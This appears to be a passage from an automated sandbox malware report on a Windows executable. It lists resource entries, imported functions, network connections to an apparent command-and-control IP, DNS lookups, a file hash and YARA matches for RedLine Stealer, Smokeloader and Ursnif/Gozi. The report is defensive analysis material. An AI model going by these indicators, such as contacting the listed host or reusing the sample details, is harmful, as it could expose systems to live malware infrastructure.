          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xad8000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xafda80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
          RT_ICON0xb0e800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
          RT_ICON0xb1d280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
          RT_ICON0xb23f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xb29580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xb4f000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
          RT_ICON0xb5fa80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
          RT_ICON0xb69300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
          RT_STRING0xb85d80x3bedataSami LappishFinland
          RT_STRING0xb85d80x3bedataSami LappishNorway
          RT_STRING0xb85d80x3bedataSami LappishSweden
          RT_STRING0xb89980x36adataSami LappishFinland
          RT_STRING0xb89980x36adataSami LappishNorway
          RT_STRING0xb89980x36adataSami LappishSweden
          RT_ACCELERATOR0xb6ea80x90dataSami LappishFinland
          RT_ACCELERATOR0xb6ea80x90dataSami LappishNorway
          RT_ACCELERATOR0xb6ea80x90dataSami LappishSweden
          RT_ACCELERATOR0xb6e000xa8dataSami LappishFinland
          RT_ACCELERATOR0xb6e000xa8dataSami LappishNorway
          RT_ACCELERATOR0xb6e000xa8dataSami LappishSweden
          RT_GROUP_CURSOR0xb70780x14data
          RT_GROUP_CURSOR0xb83580x30data
          RT_GROUP_ICON0xb0e500x30dataSami LappishFinland
          RT_GROUP_ICON0xb0e500x30dataSami LappishNorway
          RT_GROUP_ICON0xb0e500x30dataSami LappishSweden
          RT_GROUP_ICON0xacf300x22dataSami LappishFinland
          RT_GROUP_ICON0xacf300x22dataSami LappishNorway
          RT_GROUP_ICON0xacf300x22dataSami LappishSweden
          RT_GROUP_ICON0xb6d980x68dataSami LappishFinland
          RT_GROUP_ICON0xb6d980x68dataSami LappishNorway
          RT_GROUP_ICON0xb6d980x68dataSami LappishSweden
          RT_VERSION0xb83880x24cdata
          None0xb6f380xadataSami LappishFinland
          None0xb6f380xadataSami LappishNorway
          None0xb6f380xadataSami LappishSweden
          DLLImport
          KERNEL32.dllPulseEvent, ReadConsoleInputW, GetFirmwareEnvironmentVariableW, GetCPInfoExW, CreateEventW, CopyFileExA, GetProcAddress, GlobalAlloc, SetDefaultCommConfigA, OpenWaitableTimerW, GetFileAttributesW, EnumResourceTypesW, WriteFileGather, GetModuleHandleW, InterlockedCompareExchange, UnhandledExceptionFilter, LocalFlags, GlobalLock, GetConsoleAliasW, WritePrivateProfileSectionA, FindFirstVolumeMountPointA, SetLastError, SleepEx, AddAtomA, lstrcmpA, SetCalendarInfoA, GetSystemWindowsDirectoryA, EnumTimeFormatsW, GetSystemDirectoryW, AddAtomW, GetExitCodeThread, _llseek, FindNextFileW, CopyFileA, GetShortPathNameW, EnumCalendarInfoA, EnumCalendarInfoExA, AddRefActCtx, SetStdHandle, WriteConsoleW, GetCurrentThreadId, LoadLibraryA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetLastError, HeapFree, RtlUnwind, RaiseException, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameW, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, LoadLibraryW, GetConsoleCP, GetConsoleMode, CreateFileW
          USER32.dllLoadMenuW
          ADVAPI32.dllLookupAccountSidW
          SHELL32.dllFindExecutableA
          ole32.dllCoGetInstanceFromFile
          Language of compilation systemCountry where language is spokenMap
          Sami LappishFinland
          Sami LappishNorway
          Sami LappishSweden
          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 08:25:50.375926018 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.436150074 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.436259031 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.436628103 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.495964050 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.496022940 CET804970162.173.142.51192.168.2.3
          Mar 14, 2023 08:25:50.496108055 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.498536110 CET4970180192.168.2.362.173.142.51
          Mar 14, 2023 08:25:50.557815075 CET804970162.173.142.51192.168.2.3
          TimestampSource PortDest PortSource IPDest IP
          Mar 14, 2023 08:24:30.206993103 CET6270453192.168.2.38.8.8.8
          Mar 14, 2023 08:24:30.228854895 CET53627048.8.8.8192.168.2.3
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 14, 2023 08:24:30.206993103 CET192.168.2.38.8.8.80x2dc2Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 14, 2023 08:23:52.986346006 CET8.8.8.8192.168.2.30x15a2No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false
          Mar 14, 2023 08:24:30.228854895 CET8.8.8.8192.168.2.30x2dc2Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
          • 62.173.142.51
          No statistics
          Target ID:0
          Start time:08:23:58
          Start date:14/03/2023
          Path:C:\Users\user\Desktop\server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\server.exe
          Imagebase:0x400000
          File size:239104 bytes
          MD5 hash:BFE5C79A11EF437D401FE8A27EA49372
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          No disassembly